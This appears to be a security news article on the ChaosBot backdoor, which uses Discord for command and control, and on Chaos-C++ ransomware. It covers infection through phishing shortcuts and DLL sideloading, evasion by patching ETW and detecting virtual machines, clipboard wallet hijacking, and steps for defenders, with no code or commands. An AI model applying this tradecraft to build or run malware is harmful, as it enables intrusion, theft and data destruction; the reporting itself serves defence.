New Rust backdoor ChaosBot. Discord as C2 channel, destructive functions in ransomware, and cryptocurrency theft

Researchers have discovered a new Rust-based backdoor called ChaosBot, which uses Discord accounts and channels for command-and-control (C2) operations. It spreads through phishing LNK attachments and sideloaded DLLs (legitimate binaries). At the same time, a parallel malware family known as *Chaos* — written in C++ — is evolving, adding destructive capabilities such as large file deletion and clipboard address hijacking for cryptocurrency theft. How ChaosBot operates: attackers gain initial access by sending phishing emails and establishing a connection to Discord channels used for command relay. The malware executes shell commands through PowerShell, takes screenshots, and supports file download/upload operations (data exfiltration).

• Infection stages: distributed through phishing emails and disguised Windows shortcuts (LNK), which launch a PowerShell script to download the payload. The malware uses sideloaded DLLs (msedge.dll) from legitimate binaries to bypass Microsoft Edge protection. Once installed, the infection sets up a fast reverse proxy (FRP) for remote tunneling and persistent access.

• Evasion: disables Event Tracing for Windows (ETW) by patching NtDll!EtwEventWrite to prevent logging, and checks MAC addresses to detect virtual machines — exiting immediately if a VM is found.

• Chaos-C++ ransomware / destructive features: the Chaos-C++ variant adds a full wipe mode (deleting files by path) and clipboard hijacking to replace crypto wallet addresses in memory buffers, redirecting transactions. It hides under system utilities (like *System Optimizer*) and stores payloads in obfuscated directories such as %APPDATA%\%READ_IT% to ensure persistence after reboot.

• Tools and exploitation techniques: attackers attempted to use VS Code Tunnel and other remote-access methods to maintain stability and persistence. These elements make the campaign harder to detect and trace.

ChaosBot was detected in the fall of 2025 targeting financial organizations that used compromised VPNs linked to Active Directory (AD)

.

The *Chaos* malware family demonstrates a growing shift toward hybrid threats, combining ransomware with cryptojacking and “living off the land” methods, such as sideloading legitimate binaries and abusing Discord for control channels.

1. IT teams: monitor suspicious Discord and VS Code network traffic, block unauthorized FRP tunnels, and limit service account privileges (especially AD).

2. MFA & keys: enforce multi-factor authentication for VPN/AD and avoid using service accounts with elevated privileges.

3. EDR/ETW monitoring: update EDR detection rules to identify ETW tampering and clipboard data manipulation linked to sideloaded DLLs.

4. Backup & recovery: maintain offline immutable backups, and regularly test recovery workflows to minimize destructive impact.